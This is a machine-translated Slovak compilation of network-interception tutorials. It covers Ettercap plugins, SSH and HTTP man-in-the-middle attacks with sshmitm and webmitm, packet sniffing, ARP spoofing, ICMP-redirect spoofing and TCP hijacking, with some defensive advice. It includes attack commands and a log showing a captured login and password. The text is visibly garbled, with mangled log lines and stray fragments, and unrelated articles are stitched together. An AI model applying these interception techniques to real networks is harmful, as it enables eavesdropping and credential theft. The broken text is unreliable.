92.168.1.35 sa vydáva za 192.168 1.1 arp_cop: (VAROVANIE) 192.168.1.35 predstiera, že je 192.168.1.1 arp_cop: (VAROVANIE) 192.168.1.35 predstiera, že je 192.168.1.1 arp_cop: (6.1.16161.9) 192.168.81.9 .1 arp_cop: (VAROVANIE) 192.168. 1.35 predstiera, že je 192.168.1.1 arp_cop: (VAROVANIE) 192.168.1.35 predstiera, že je 192.168.1.1 arp_cop: (VAROVANIE) 192.168.1.35) 192.168.1.35.19rp_19.19.18 predstiera, že je .16 8.1.35 sa vydáva za 192,168 .1.1. .............................

7.2 automatické pridávanie

Automaticky pridá nové obete, keď sa pripoja k útoku ARP poisoning mitm. Hľadá požiadavky ARP v lokálnej sieti a ak sa zistí, doplnok pridá hostiteľa do zoznamu obetí, ak bol zoznam špecifikovaný ako TARGET. Hostiteľ sa pridá, keď je z neho viditeľná požiadavka arp.

7,3 chk_poison

Skontroluje, či sú moduly arp etch v ettercap úspešné. Posiela sfalšované ICMP echo pakety všetkým obetiam návnady, pričom predstiera, že je každá obeťou. Dokáže zachytiť odpoveď ICMP s našou MAC adresou ako cieľom, čo znamená, že návnada medzi týmito dvoma cieľmi je úspešná. Kontroluje obe cesty každého pripojenia.

7.4 dns_spoof

Tento doplnok prerušuje požiadavky DNS a odpovedá falošnou (falošnou) odpoveďou. Úpravou súboru etter.dns si môžete vybrať, na ktorú adresu má plugin odpovedať. Plugin zachytáva požiadavky A, AAAA, PTR, MX, WINS, SRV a TXT. Ak to bola požiadavka A, názov sa vyhľadá v súbore a vráti sa IP adresa (v názve môžete použiť zástupné znaky).

To isté platí pre žiadosti AAAA.

7.5 find_conn

Veľmi jednoduchý doplnok, ktorý počúva požiadavky ARP, aby vám ukázal všetky ciele, s ktorými chce hostiteľ komunikovať. Môže vám tiež pomôcť nájsť adresy v neznámych sieťach LAN.

Ettercap -TQzP find_conn ettercap -TQu -i eth0 -P find_conn

7.6 find_ettercap

Pokúsi sa identifikovať ettercap pakety odoslané do LAN. Môže to byť užitočné pri identifikácii niekoho, kto sa pokúša použiť ettercap. Nespoliehajte sa na to na 100 %, keďže testy fungujú len na špecifické sekvencie/ID čísla.

7.7 scan_poisoner

Skontroluje, či niekto nerobí návnadu medzi niektorým z hostiteľov na zozname a nami. Najprv skontroluje, či dvaja hostitelia v zozname majú to isté Mac adresa. To môže znamenať, že jeden z nich nás otrávi tým, že sa vydáva za toho druhého. V prostredí proxy-arp môže generovať veľa falošných poplachov. Na vykonanie tejto kontroly musíte vytvoriť zoznam hostiteľov. Potom odošle icmp echo pakety každému hostiteľovi v zozname a skontroluje, či sa mac adresa zdroja odpovede líši od adresy, ktorú sme s touto IP uložili do zoznamu. To by mohlo znamenať, že niekto láka tohto hostiteľa tým, že predstiera, že má našu IP adresu, a preposiela nám zachytené pakety. Tento aktívny test nemôžete spustiť v neútočnom režime.

Ettercap -TQP scan_poisoner //

7.8 search_promisc

Snaží sa zistiť, či niekto nečuchá (počúva) v promiskuitnom režime. Každému cieľu v zozname hostiteľov posiela dve rôzne zle vytvorené požiadavky arp a čaká na odpovede. Ak odpoveď prišla od cieľového hostiteľa, je viac-menej pravdepodobné, že cieľ má sieťovú kartu v promiskuitnom režime. Môže generovať falošné poplachy. Môžete ho spustiť z príkazového riadku alebo z ponuky doplnkov. Keďže počúva odpovede arp, bude lepšie, ak ich pri odosielaní požiadaviek arp nebudete používať.

Ettercap -TQP search_promisc /192.168.0.1/ ettercap -TQP search_promisc //

Príklad úspešného uhádnutia dvoch sieťových kariet v promiskuitnom režime:

Rozbaliť

Root@HackWare:~# ettercap -TQP search_promisc ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team Počúvanie na: eth0 -> 08:00:27:AF:30:B9 192.168.1.35:5005:25. 27ff:feaf:30b9/64 Disekcia SSL vyžaduje platný skript "redir_command_on" v súbore etter.conf Ettercap nemusí fungovať správne. /proc/sys/net/ipv6/conf/eth0/use_tempaddr nie je nastavené na 0. Privilégiá klesli na EUID 65534 EGID 65534... 33 zásuvných modulov 42 disektorov protokolov 57 monitorovaných portov 20388 odtlačok prsta dodávateľa mac 1766 služby odtlačkov prstov tc82 známy OS OS : neboli špecifikované žiadne skripty, nespúšťa sa! Randomizácia 255 hostiteľov na skenovanie... Skenovanie celej masky siete pre 255 hostiteľov... * |================================ ==================================>

Root@HackWare:~# ettercap -TQP search_promisc ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team Počúvanie na: eth0 -> 08:00:27:AF:30:B9 192.168.1.35:5005:25. 27ff:feaf:30b9/64 Disekcia SSL vyžaduje platný skript "redir_command_on" v súbore etter.conf Ettercap nemusí fungovať správne. /proc/sys/net/ipv6/conf/eth0/use_tempaddr nie je nastavené na 0. Privilégiá klesli na EUID 65534 EGID 65534... 33 zásuvných modulov 42 disektorov protokolov 57 monitorovaných portov 20388 odtlačok prsta dodávateľa mac 1766 služby odtlačkov prstov tc82 známy OS OS : neboli špecifikované žiadne skripty, nespúšťa sa! Randomizácia 255 hostiteľov na skenovanie... Skenovanie celej masky siete pre 255 hostiteľov... * |================================ ===================================>| 100,00 % 5 hostiteľov pridaných do zoznamu hostiteľov... Spúšťa sa zjednotené snímanie... Len text Rozhranie aktivované... Stlačením „h“ zobrazíte pomoc v riadku Aktivuje sa doplnok search_promisc... search_promisc: Hľadá sa promiskové NIC... Menej pravdepodobné šnurovanie NIC : - 192.168.1.36 - 192.168.1.34 Najpravdepodobnejšie sniffing NIC: - ŽIADNE Zatváranie textového rozhrania... Ukončenie ettercap... Vyčistenie Lua dokončené! Jednotné šnupanie bolo zastavené.

7,9 sslstrip

Počas SSL mitm útoku ettercap nahradí skutočný SSL certifikát svojim vlastným. Falošný certifikát sa vytvára za chodu a všetky polia sú vyplnené v súlade so skutočným certifikátom predloženým serverom.

  • (62%)
  • (56.5%)
  • (NÁHODNÉ – 0,2 %)
  • V tomto článku sa pozrieme na útoky ako Man-in-the-Middle, alebo skôr metóda
    presmerovanie prevádzky SSH a HTTP pomocou útoku Man in the Middle. Neťahajme mačku za chvost, ale poďme na vec.

    Muž uprostred (v skratke MitM, z ruštiny jednoducho - „útok sprostredkovateľa“ alebo „muž
    in the middle") je typ útoku založený na presmerovaní prevádzky medzi dvoma strojmi s cieľom zachytiť informácie - ďalej ich študovať, zničiť alebo upraviť. Takže prvá vec, ktorú potrebujeme, je balík dsniff (odkaz na balík uvidíte na koniec článku). Prečo Áno, pretože tento balík obsahuje všetky potrebné nástroje vrátane sshmitm (presmerovanie prevádzky SSH) a httpmitm (presmerovanie prevádzky HTTP), ktoré môžu obísť nasledujúcu bezpečnostnú schému: pokiaľ viete, protokoly s šifrovanie dát je dosť - sú "bezpečné" (šifrovanie pomáha :)) a neumožňujú útoky "navrch" sieťovej vrstvy. Šifrovací kľúč je hackerovi neznámy - údaje nie je možné dešifrovať a vložte aj príkaz. Všetko sa zdá byť v poriadku, ale tu je návod
    keďže útočné programy MitM (sshmitm a httpmitm) z balíka dsniff dokážu obísť tento systém bezpečnosť (môžete obísť takmer všetko). To všetko sa vykonáva podľa nasledujúceho princípu:
    medzihostiteľ prijme požiadavku od klienta, "povie" mu, že je to server, a potom sa pripojí k skutočnému serveru.
    Druhá vec, ktorú potrebujeme, sú rovné ruky, štvrtá vec – najdôležitejšia – je túžba a, samozrejme, obeť, teda počítač, na ktorý zaútočíme.

    Presmerovanie prevádzky SSH

    Po príprave nástrojov ste pochopili, čo bolo čo a prečo :). Získajte sshmitm - teraz presmerujeme prevádzku SSH (všetko, čomu ste nerozumeli v teoretickej časti - prečítajte si vyššie)
    s využitím nedostatkov dnešnej PKI (infraštruktúra verejných kľúčov – schéma správy kľúčov založená na
    metódy asymetrickej kryptografie). Pozrime sa na syntax
    sshmitm:

    sshmitm [-d] [-I] [-p port] hostiteľ

    D
    povoliť výstup ladenia (t. j. pokročilejší režim)

    ja
    únos relácie

    P port
    počúvací port

    hostiteľ
    adresu vzdialeného hostiteľa, ktorého relácie budú zachytené

    prístav
    port na vzdialenom hostiteľovi

    Všetko pôsobí jednoducho a vkusne – nie je v tom nič zložité :). Začnime s realizáciou útoku!

    # sshmitm server.target.gov // zadajte váš server SSH
    sshmitm: prenos na server server.target.gov

    Keďže nemáme skutočný kľúč SSH, tlmočník príkazov napadnutého
    zobrazí žiadosť o kontrolu hostiteľského kľúča, všetko bude vyzerať asi takto:

    clientmachine$ server.target.gov
    @UPOZORNENIE: IDENTIFIKÁCIA VZDIALENÉHO HOSTITEĽA SA ZMENILA! @
    JE MOŽNÉ, ŽE NIEKTO ROBÍ NIEČO NESLUŠNÉ!
    Niekto by vás mohol práve teraz odpočúvať (útok muža uprostred)!
    Je tiež možné, že hostiteľský kľúč RSA bol práve zmenený.
    Kontaktujte správcu systému.

    A potom sa používateľ rozhodne, či sa pripojí alebo nie. Ak áno, potom budeme mať plnú kontrolu nad reláciou SSH.
    ALE! Ak sa používateľ nikdy nepripojil k tomuto autu, môže sa zobraziť nasledujúca správa:

    Autentickosť hostiteľa "server.target.gov" nemôže byť stanovená
    RSA kľúčový odtlačok prsta je
    bla:bla:bla;bla;bla.......
    Naozaj chcete pokračovať v pripájaní (áno/nie)?

    Tu má používateľ tiež dve možnosti - pripojiť sa alebo nie. Ak áno, tak sme reláciu zachytili, ak nie, tak bohužiaľ... :(.
    Vo všeobecnosti bol útok úspešný, ak sa používateľ pripojil a sshmitm zase zaznamenal všetky prechody a prihlásenia a to veľmi čitateľným spôsobom :)
    Prirodzene, toto nie je jediný zachytávač relácie SSH, ale keď sa s tým zoznámite, môžete ľahko zvládnuť ďalší :)

    Presmerovanie návštevnosti HTTP

    Teraz presmerujeme HTTP prevádzku. Opäť budeme potrebovať predtým vybraný nástroj: httpmitm, ktorý počúva porty 80 (HTTP -) a 443 (HTTPS -), zachytáva WEB požiadavky, potom sa pripája k serveru a posiela požiadavky na klientsky počítač. Program tiež generuje kľúče SSL a certifikáty SSL pomocou OpenSSL. Potom, po vyskúšaní
    sa pripojí k stránke (target.gov), prehliadač skontroluje certifikát SSL. Keďže sa certifikáty nezhodujú, prehliadač používateľa na to upozorní
    nesprávny certifikát SSL. Z pohľadu útočníka to bude vyzerať asi takto:

    #webmitm -d
    webmitm: transparentné odovzdávanie
    webmitm: nové pripojenie od
    ZÍSKAJTE [odkaz]/uzerz.php?user=hellknights&password=neskaju1qwerty HTTP/[verzia]
    Typ pripojenia]
    Hostiteľ: www.target.gov
    User-Agent: [informácie o systéme, prehliadači]
    [atď, atď, atď]
    Súbor cookie: [cookies]

    Takto to všetko vyzerá zvonku -
    pripojenie SSL je zachytené a zachytáva nešifrované údaje.

    Záver

    V tomto článku sme sa pozreli na presmerovanie SSH a HTTP prevádzky pomocou útoku Man in the Middle – prehľadne, podrobne, stručne. Ďalšie presmerovače HTTP a SSH
    Návštevnosť pomocou MitM zvládnete rýchlo, ak ovládate aj tieto :)). Ak by bolo niečo nejasné, tak...

    Zachytenie údajov cez sieť je príjem akýchkoľvek informácií zo vzdialeného počítačového zariadenia. Môže pozostávať z osobných údajov používateľa, jeho správ a záznamov o návštevách webových stránok. Snímanie údajov môže byť vykonávané spywarom alebo pomocou sieťových snifferov.

    Spyware je špeciálny softvér, ktorý dokáže zaznamenať všetky informácie prenášané cez sieť z konkrétnej pracovnej stanice alebo zariadenia.

    Sniffer je program alebo počítačová technológia, ktorá zachytáva a analyzuje prevádzku, ktorá prechádza sieťou. Sniffer vám umožňuje pripojiť sa k webovej relácii a vykonávať rôzne operácie v mene vlastníka počítača.

    Ak sa informácie neprenášajú v reálnom čase, spyware vytvárať správy, ktoré uľahčujú prezeranie a analýzu informácií.

    Odpočúvanie siete sa môže vykonávať legálne alebo nelegálne. Hlavným dokumentom stanovujúcim zákonnosť získavania informácií je Dohovor o počítačovej kriminalite. Vznikla v Maďarsku v roku 2001. Právne požiadavky sa môžu v jednotlivých štátoch mierne líšiť, ale hlavné posolstvo je pre všetky krajiny rovnaké.

    Klasifikácia a metódy zachytávania dát cez sieť

    V súlade s vyššie uvedeným možno odpočúvanie informácií cez sieť rozdeliť na dva typy: autorizované a neoprávnené.

    Autorizovaný zber údajov sa vykonáva na rôzne účely, od ochrany podnikových informácií až po zaistenie národnej bezpečnosti. Dôvody na vykonanie takejto operácie sú určené legislatívou, špeciálnymi službami, orgánmi činnými v trestnom konaní a odborníkmi administratívne organizácie a firemné bezpečnostné služby.

    Existujú medzinárodné štandardy na vykonávanie odpočúvania údajov. Európskemu inštitútu pre telekomunikačné normy sa podarilo zosúladiť množstvo technických procesov (ETSI ES 201 158 „Telekomunikačná bezpečnosť; Zákonné odpočúvanie (LI); Požiadavky na sieťové funkcie“), na ktorých je založené odpočúvanie informácií. V dôsledku toho bola vyvinutá systémová architektúra, ktorá pomáha špecialistom tajných služieb a správcom sietí legálne získavať údaje zo siete. Vyvinutá štruktúra na implementáciu odpočúvania dát cez sieť sa používa pre káblové a bezdrôtové systémy hlasové hovory, ako aj korešpondencia poštou, prenos hlasových správ cez IP, výmena informácií prostredníctvom SMS.

    Neoprávnené zachytenie údajov cez sieť je vykonávané útočníkmi, ktorí sa chcú zmocniť dôverných údajov, hesiel, podnikových tajomstiev, adries počítačových strojov v sieti atď. Na dosiahnutie svojich cieľov hackeri zvyčajne používajú analyzátor sieťovej prevádzky - sniffer. Tento program alebo hardvérovo-softvérové ​​zariadenie dáva podvodníkovi možnosť zachytiť a analyzovať informácie v rámci siete, ku ktorej je pripojený používateľ obete, vrátane šifrovanej prevádzky SSL prostredníctvom spoofingu certifikátov. Údaje o premávke možno získať rôznymi spôsobmi:

    • počúvanie sieťového rozhrania,
    • pripojenie odpočúvacieho zariadenia k prerušeniu kanála,
    • vytvorenie dopravnej vetvy a jej duplikovanie pre čichača,
    • vykonaním útoku.

    Existujú aj komplexnejšie technológie na zachytávanie dôležitých informácií, ktoré umožňujú zasahovať do sieťových interakcií a meniť údaje. Jednou z takýchto techník sú sfalšované požiadavky ARP. Podstatou metódy je nahradenie IP adries medzi počítačom obete a zariadením útočníka. Ďalšou metódou, ktorú možno použiť na zachytenie údajov cez sieť, je falošné smerovanie. Zahŕňa nahradenie IP adresy sieťového smerovača vlastnou adresou. Ak kyberzločinec vie, ako je organizovaná lokálna sieť, v ktorej sa obeť nachádza, môže ľahko zorganizovať príjem informácií z počítača používateľa na jeho IP adresu. Slúži aj zachytenie TCP spojenia efektívnym spôsobom odpočúvanie údajov. Útočník preruší komunikačnú reláciu vygenerovaním a odoslaním TCP paketov do počítača obete. Potom je komunikačná relácia obnovená, zachytená a pokračovať v nej zločinec namiesto klienta.

    Predmet vplyvu

    Objektmi zachytávania údajov cez sieť môžu byť vládne agentúry, priemyselné podniky, komerčné štruktúry a bežní používatelia. V rámci organizácie alebo obchodnej spoločnosti je možné zachytávať informácie za účelom ochrany sieťovej infraštruktúry. Spravodajské služby a orgány činné v trestnom konaní môžu vykonávať hromadné odpočúvanie informácií prenášaných od rôznych vlastníkov v závislosti od danej úlohy.

    Ak hovoríme o kyberzločincoch, potom sa každý používateľ alebo organizácia môže stať objektom vplyvu s cieľom získať údaje prenášané cez sieť. Pri autorizovanom prístupe je dôležitá informatívna časť prijatých informácií, zatiaľ čo útočníka viac zaujímajú údaje, ktoré je možné použiť na zabavenie v hotovosti alebo cenné informácie pre jeho následný predaj.

    Obeťami odpočúvania informácií kyberzločincami sa najčastejšie stávajú používatelia pripájajúci sa na verejnú sieť, napríklad v kaviarni s hotspotom. Wi-Fi pripojenie na internet. Útočník sa pripojí k webovej relácii pomocou sniffera, nahradí údaje a ukradne osobné informácie. Prečítajte si viac o tom, ako sa to deje v článku.

    Zdroj ohrozenia

    Autorizované odpočúvanie informácií v podnikoch a organizáciách vykonávajú prevádzkovatelia verejnej sieťovej infraštruktúry. Ich činnosť je zameraná na ochranu osobných údajov, obchodného tajomstva a iné dôležitá informácia. Zákonne môžu prenos správ a súborov monitorovať spravodajské služby, orgány činné v trestnom konaní a rôzne vládne orgány, aby bola zabezpečená bezpečnosť občanov a štátu.

    Zločinci sa podieľajú na nezákonnom odpočúvaní údajov. Aby ste sa nestali obeťou kyberzločinca, musíte dodržiavať niektoré odporúčania odborníkov. Napríklad by ste nemali vykonávať operácie vyžadujúce autorizáciu a prenos citlivých údajov na miestach, kde je pripojenie k verejným sieťam. Je bezpečnejšie vybrať si siete so šifrovaním a ešte lepšie - používať osobné 3G a LTE modemy. Pri prenose osobných údajov sa odporúča ich šifrovanie pomocou protokolu HTTPS alebo osobného VPN tunela.

    Svoj počítač môžete chrániť pred zachytením sieťovej prevádzky pomocou kryptografie a antisnifferov; Telefonické pripojenie namiesto bezdrôtového prístupu k sieti zníži riziká.


    Táto lekcia popisuje technológie hackovania siete založené na zachytávaní sieťových paketov. Hackeri používajú takéto technológie na počúvanie sieťovej prevádzky s cieľom ukradnúť cenné informácie, organizovať zachytenie údajov za účelom útoku typu man-in-the-middle, zachytávať pripojenia TCP, čo umožňuje napríklad spoofing údajov a vykonávať iné rovnako zaujímavé akcie. Bohužiaľ, väčšina týchto útokov je v skutočnosti implementovaná len pre unixové siete, na ktoré môžu hackeri využiť oboje špeciálne služby a unixové systémové nástroje. Siete Windows boli očividne ignorované hackermi a my sme nútení obmedziť náš popis nástrojov na zachytávanie údajov na sniffer programy určené na triviálne počúvanie sieťových paketov. Nemali by sme však zanedbávať aspoň teoretický popis takýchto útokov, najmä pre anti-hackerov, pretože znalosť používaných hackerských technológií pomôže predchádzať mnohým problémom.

    Snímanie siete

    Zvyčajne sa používa na snímanie ethernetových sietí. sieťové karty prepnuté do režimu počúvania. Počúvanie Ethernetové siete vyžaduje pripojenie počítača s programom sniffer k segmentu siete, po ktorom sa hackerovi sprístupní všetka sieťová prevádzka odosielaná a prijímaná počítačmi v tomto segmente siete. Ešte jednoduchšie je zachytiť prevádzku z rádiových sietí, ktoré využívajú sprostredkovateľov bezdrôtových sietí – v tomto prípade ani nemusíte hľadať miesto na pripojenie ku káblu. Alebo sa útočník môže pripojiť k telefónnej linke spájajúcej počítač s internetovým serverom a nájsť si na to vhodné miesto (telefónne linky sú zvyčajne uložené v pivniciach a na iných zriedkavo navštevovaných miestach bez akejkoľvek ochrany).

    Na demonštráciu technológie sniffovania použijeme veľmi populárny sniffer program SpyNet, ktorý možno nájsť na mnohých webových stránkach. Oficiálna stránka programu SpyNet sa nachádza na adrese http://members.xoom.com/layrentiu2/, odkiaľ si môžete stiahnuť demo verziu programu.

    Program SpyNet pozostáva z dvoch komponentov – CaptureNet a PipeNet. Program CaptureNet umožňuje zachytávať pakety prenášané cez ethernetovú sieť na úrovni siete, t.j. vo forme ethernetových rámcov. Softvér PipeNet vám umožňuje zostaviť ethernetové rámce do paketov aplikačnej vrstvy a obnoviť napríklad správy Email, správy protokolu HTTP (výmena informácií s webovým serverom) a vykonávať ďalšie funkcie.

    Bohužiaľ, v ukážke SpyNet sú možnosti PipeNet obmedzené na ukážku zostavy paketov HTTP, takže nebudeme môcť predviesť SpyNet v plnom rozsahu. Budeme však demonštrovať sieťové sniffovacie schopnosti SpyNetu na príklade našej experimentálnej siete textový súbor z hostiteľa Sword-2000 na hostiteľa Alex-Z pomocou obvyklého Prieskumník systému Windows. Zároveň na počítači A1ex-1 spustíme program CaptureNet, ktorý zachytí prenášané pakety a umožní nám čítať obsah prenášaného súboru v ethernetových rámcoch. Na obr. 1 zobrazuje text tajnej správy v súbore secret.txt; tento text sa pokúsime nájsť v zachytených ethernetových rámcoch.

    Ryža. 1. Text tajnej správy v okne Poznámkový blok

    Ak chcete zachytiť ethernetové rámce, postupujte takto:

    Na počítači Alex-Z spustite program CaptureNet. V zobrazenom pracovnom okne programu vyberte príkaz ponuky Capture * Start (Capture * Start) a spustite proces zachytávania sieťových rámcov.

    Pomocou prieskumníka Windows skopírujte súbor security.txt z počítača Sword-2000 do A1ex-3.

    Po prenose súboru secret.txt vyberte príkaz ponuky Capture * Stop a zastavte proces zachytávania.

    Zachytené ethernetové rámce sa objavia na pravej strane okna programu CaptureNet (obrázok 2), pričom každý riadok v hornom zozname predstavuje ethernetový rámec a pod zoznamom obsah vybratého rámca.

    Ryža. 2. Ethernetový rámec obsahuje tajný text správy

    Po prezretí zoznamu zachytených snímok môžeme ľahko nájsť ten, ktorý obsahuje text, ktorý sme preniesli. Toto je veľmi veľké tajomstvo (Toto je veľmi veľké tajomstvo).

    Zdôrazňujeme, že ide o najjednoduchší príklad, kedy bola zaznamenaná všetka zachytená sieťová prevádzka. CaptureNet vám umožňuje zachytávať pakety odosielané cez špecifické protokoly a na špecifické hostiteľské porty, vyberať správy so špecifickým obsahom a zhromažďovať zachytené údaje do súboru. Technika vykonávania takýchto akcií je jednoduchá a dá sa naučiť pomocou systému pomoci programu SpyNet.

    Okrem primitívneho sieťového odpočúvania majú hackeri prístup k sofistikovanejším prostriedkom na odpočúvanie dát. Nižšie je uvedený stručný prehľad takýchto metód, aj keď z teoretického hľadiska. Dôvodom je, že pre siete Windows je praktická implementácia útokov na zachytávanie údajov extrémne obmedzená a sada spoľahlivých nástrojov na útoky na zachytávanie údajov je dosť chudobná.

    Metódy na zachytenie sieťovej prevádzky

    Snímanie siete pomocou programov na analýzu siete, ako je CaptureNet vyššie, je prvým a najjednoduchším spôsobom zachytávania údajov. Okrem SpyNet sa na sniffovanie siete používa mnoho nástrojov, pôvodne vyvinutých na účely analýzy sieťovej aktivity, diagnostiky sietí, výberu prevádzky podľa špecifikovaných kritérií a iných úloh správy siete. Príkladom takéhoto programu je tcpdump (http://www.tcpdump.org), ktorý vám umožňuje zaznamenávať sieťovú prevádzku do špeciálneho denníka pre následnú analýzu.

    Na ochranu pred sieťovým odpočúvaním sa používajú špeciálne programy, napríklad AntiSniff (http://www.securitysoftwaretech.com/antisniff), ktoré sú schopné identifikovať počítače v sieti, ktoré počúvajú sieťovú prevádzku. Na vyriešenie svojich problémov používajú antisniffer programy špeciálny znak prítomnosti odpočúvacích zariadení v sieti - sieťová karta počítača sniffer musí byť v špeciálnom režime počúvania. V režime počúvania reagujú sieťové počítače špeciálnym spôsobom na IP datagramy odoslané testovanému hostiteľovi. Napríklad počúvajúci hostitelia zvyčajne spracovávajú všetku prichádzajúcu komunikáciu, nielen datagramy odoslané na adresu hostiteľa. Existujú ďalšie znaky, ktoré naznačujú podozrivé správanie hostiteľa, ktoré AntiSniff dokáže rozpoznať.

    Odpočúvanie je nepochybne veľmi užitočné z pohľadu útočníka, pretože umožňuje získať množstvo užitočných informácií – heslá prenášané cez sieť, adresy sieťových počítačov, dôverné údaje, listy atď. Jednoduché odpočúvanie však hackerovi neumožňuje zasahovať do sieťovej komunikácie medzi dvoma hostiteľmi s cieľom upraviť a poškodiť údaje. Na vyriešenie takéhoto problému je potrebná komplexnejšia technológia.

    Falošné požiadavky ARP

    Na zachytenie a prevzatie procesu sieťovej interakcie medzi dvoma hostiteľmi A a B môže útočník nahradiť IP adresy interagujúcich hostiteľov svojou vlastnou IP adresou odoslaním falošných správ ARP (Address Resolution Protocol) hostiteľom A a B. S protokolom ARP sa môžete zoznámiť v prílohe D, ktorá popisuje postup rozlíšenia (prevodu) IP adresy hostiteľa na adresu stroja (MAC adresu) napevno zakódovanú do sieťovej karty hostiteľa. Pozrime sa, ako môže hacker použiť ARP na zachytenie sieťovej komunikácie medzi hostiteľmi A a B.

    Na zachytenie sieťovej prevádzky medzi hostiteľmi A a B hacker vnúti týmto hostiteľom svoju IP adresu, aby A a B použili túto sfalšovanú IP adresu pri výmene správ. Na uloženie svojej IP adresy hacker vykoná nasledujúce operácie.

    Útočník zisťuje MAC adresy hostiteľov A a B napríklad pomocou príkazu nbtstat z balíka W2RK.

    Útočník posiela na identifikované MAC adresy hostiteľov A a B správy, ktoré sú sfalšovanými odpoveďami ARP na žiadosti o rozlíšenie IP adries hostiteľov na MAC adresy počítačov. Hostiteľ A je informovaný, že IP adresa hostiteľa B zodpovedá MAC adrese počítača útočníka; hostiteľ B je informovaný, že IP adresa hostiteľa A tiež zodpovedá MAC adrese počítača útočníka.

    Hostitelia A a B ukladajú prijaté MAC adresy do svojich vyrovnávacích pamätí ARP a potom ich používajú na vzájomné posielanie správ. Keďže IP adresy A a B zodpovedajú MAC adrese útočníkovho počítača, hostitelia A a B, nič netušiace, komunikujú cez sprostredkovateľa, ktorý môže s ich správami robiť čokoľvek.

    Na ochranu pred takýmito útokmi musia správcovia siete udržiavať databázu s tabuľkou zhody medzi MAC adresami a IP adresami ich počítačov v sieti. Ďalej pomocou špeciálneho softvér Napríklad nástroje arpwatch (ftp://ftp.ee.lbl.gov/arpwatch-2.lab.tar.gz) môžu pravidelne prehľadávať sieť a identifikovať nezrovnalosti.

    V sieťach UNIX možno tento typ útoku s falošnou požiadavkou ARP implementovať pomocou systémových nástrojov na monitorovanie a správu sieťovej prevádzky, ako je napríklad arpredirect. Bohužiaľ sa nezdá, že by takéto spoľahlivé nástroje boli implementované v sieťach Windows 2000/XP. Napríklad na webovej stránke NTsecurity (http://www.ntsecurity.nu) si môžete stiahnuť pomôcku GrabitAII, ktorá je prezentovaná ako nástroj na presmerovanie prevádzky medzi sieťovými hostiteľmi. Základná kontrola funkčnosti utility GrabitAII však ukazuje, že k úplnému úspechu pri implementácii jej funkcií je ešte ďaleko.

    Falošné smerovanie

    Na zachytenie sieťovej prevádzky môže útočník sfalšovať skutočnú IP adresu sieťového smerovača svojou vlastnou IP adresou, a to napríklad pomocou sfalšovaných správ ICMP Redirect. Hostiteľ A musí podľa RFC-1122 vnímať prijatú Redirect správu ako odpoveď na datagram odoslaný inému hostiteľovi, napríklad B. Hostiteľ A určuje svoje akcie na Redirect správe na základe obsahu prijatej Redirect správy, a ak je v Redirect from A to B po novej trase špecifikované presmerovanie datagramu, bude to presne to, čo hostiteľ A urobí.

    Na vykonanie falošného smerovania musí útočník poznať niektoré podrobnosti o organizácii lokálnej siete, v ktorej sa nachádza hostiteľ A, najmä IP adresu smerovača, cez ktorý sa prevádzka odosiela z hostiteľa A do B. S týmto vedomím útočník vygeneruje IP datagram, v ktorom je IP - adresa odosielateľa definovaná ako IP adresa smerovača a príjemcom je hostiteľ A. Datagram obsahuje aj správu ICMP Redirect s adresovým poľom nového smerovača nastaveným na IP adresa počítača útočníka. Po prijatí takejto správy hostiteľ A pošle všetky správy na IP adresu počítača útočníka.

    Na ochranu pred takýmto útokom by ste mali zakázať (napríklad pomocou brány firewall) spracovanie správ ICMP Redirect na hostiteľovi A a príkaz tracert (v Unixe je to príkaz tracerout) môže odhaliť IP adresu počítača útočníka. . Tieto nástroje sú schopné nájsť ďalšiu cestu, ktorá sa objavila v lokálnej sieti a ktorá nebola poskytnutá počas inštalácie, pokiaľ, samozrejme, správca siete nie je ostražitý.

    Vyššie uvedené príklady odpočúvania (na ktoré sa možnosti útočníkov zďaleka neobmedzujú) nás presviedčajú o potrebe chrániť dáta prenášané cez sieť, ak dáta obsahujú dôverné informácie. Jediným spôsobom ochrany pred zachytením sieťovej prevádzky je použitie programov, ktoré implementujú kryptografické algoritmy a šifrovacie protokoly a zabraňujú prezradeniu a nahradeniu tajných informácií. Na vyriešenie takýchto problémov poskytuje kryptografia nástroje na šifrovanie, podpisovanie a overovanie pravosti správ prenášaných cez zabezpečené protokoly.

    Praktickú implementáciu všetkých kryptografických metód na ochranu výmeny informácií opísaných v kapitole 4 poskytujú siete VPN (Virtual Private Network). Stručný prehľad princípov a techník kryptografickej bezpečnosti možno nájsť v prílohe E a Detailný popis nástroje kryptografickej ochrany poskytované aplikáciou PGP Desktop Security (http://www.pgp.com).

    Zachytenie spojenia TCP

    Najsofistikovanejší útok na zachytenie sieťovej prevádzky by sa mal považovať za zachytávanie spojenia TCP (TCP hijacking), keď hacker preruší aktuálnu komunikačnú reláciu s hostiteľom generovaním a odosielaním paketov TCP napadnutému hostiteľovi. Potom pomocou schopnosti protokolu TCP obnoviť prerušené pripojenie TCP hacker zachytí prerušenú komunikačnú reláciu a pokračuje v nej namiesto odpojeného klienta.

    Bolo vytvorených niekoľko účinných utilít na vykonávanie útokov na zneškodnenie TCP spojenia, ale všetky sú implementované pre platformu Unix a na webových stránkach sú tieto utilitky prezentované len vo forme zdrojového kódu. Ako presvedčení praktici o ušľachtilej veci hackingu nám teda útoky pomocou metódy odpočúvania TCP spojenia príliš neposlúžia. (Tí, ktorí chcú pochopiť cudzí programový kód, môžu navštíviť stránku http://www.cri.cz/~kra/index.html, kde si môžete stiahnuť zdroj známa pomôcka na odpočúvanie TCP spojenia Hunt od Pavla Krauza).

    Napriek nedostatku praktických nástrojov nemôžeme ignorovať takú zaujímavú tému, akou je zachytávanie TCP spojení, a pri niektorých aspektoch takýchto útokov sa pozastavíme. Niektoré informácie o štruktúre TCP paketu a postupe nadväzovania TCP spojení sú uvedené v prílohe D tejto knihy, tu sa však zameriame na otázku – čo presne umožňuje hackerom vykonávať útoky na zachytenie TCP spojenia? Pozrime sa na túto tému podrobnejšie, spoliehajúc sa najmä na diskusiu v a.

    Protokol TCP (Transmission Control Protocol) je jedným zo základných protokolov transportnej vrstvy OSI, ktorý vám umožňuje vytvárať logické spojenia cez virtuálny komunikačný kanál. Cez tento kanál sa vysielajú a prijímajú pakety so zaznamenanou ich sekvenciou, riadi sa tok paketov, organizuje sa opakovaný prenos skreslených paketov a na konci relácie sa preruší komunikačný kanál. Protokol TCP je jediným základným protokolom v rodine TCP/IP, ktorý má pokročilý systém identifikácie správ a pripojenia.

